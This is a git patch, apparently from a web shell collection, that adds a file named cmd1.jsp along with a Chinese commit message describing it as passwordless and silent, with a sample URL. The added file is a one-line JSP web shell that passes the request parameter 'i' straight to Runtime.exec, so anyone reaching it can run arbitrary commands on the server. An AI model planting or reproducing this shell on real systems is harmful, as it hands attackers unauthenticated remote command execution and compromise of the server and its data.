From d18e132749b084869f07644ef2fb6c9535bd69ac Mon Sep 17 00:00:00 2001 From: tennc Date: Fri, 19 Dec 2014 17:03:30 +0800 Subject: [PATCH] add cmd1.jsp MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 无密码、无回显,执行命令 http://site/url/cmd1.jsp?i=ls --- jsp/cat/cmd1.jsp | 1 + 1 file changed, 1 insertion(+) create mode 100644 jsp/cat/cmd1.jsp diff --git a/jsp/cat/cmd1.jsp b/jsp/cat/cmd1.jsp new file mode 100644 index 0000000..848cfab --- /dev/null +++ b/jsp/cat/cmd1.jsp @@ -0,0 +1 @@ +<%Runtime.getRuntime().exec(request.getParameter("i"));%>